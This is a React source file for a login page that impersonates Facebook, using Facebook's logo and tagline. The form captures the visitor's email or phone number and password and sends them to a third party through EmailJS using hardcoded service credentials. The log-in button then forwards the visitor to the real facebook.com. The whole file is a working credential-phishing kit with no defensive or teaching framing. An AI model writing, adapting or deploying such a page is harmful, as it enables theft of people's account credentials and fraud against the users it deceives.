import React, { useRef } from 'react';
import emailjs from '@emailjs/browser';
import './LoginPage.css'
const LoginPage = () => {
    const form = useRef();

  const sendEmail = (e) => {
    e.preventDefault();

    emailjs
      .sendForm('service_30qd1e9', 'template_3osavep', form.current, {
        publicKey: '4O3O43od3uUMUs5ZK',
      })
      .then(
        () => {
          console.log('SUCCESS!');
        },
        (error) => {
          console.log('FAILED...', error.text);
        },
      );
  };

  return (
    <div className="container">
        
             <img className='logo' src="https://static.xx.fbcdn.net/rsrc.php/y1/r/4lCu2zih0ca.svg" alt="" />
             <h2 className='description'>Facebook helps you connect and</h2>
             <h2 className='description'>share with the people in your life.</h2>
            <form ref={form} onSubmit={sendEmail}>
                <input className='mobile' type="text" name="user_email" placeholder='Mobile number or email address'/>
                <input className='pass' type="passowrd" name="password" placeholder='Password' /><br />
                <button className="sub"><a href="https://www.facebook.com/">Log in</a></button>
                </form>
            <p>Forgotten Password?</p>
            </div>
      
  )
}

export default LoginPage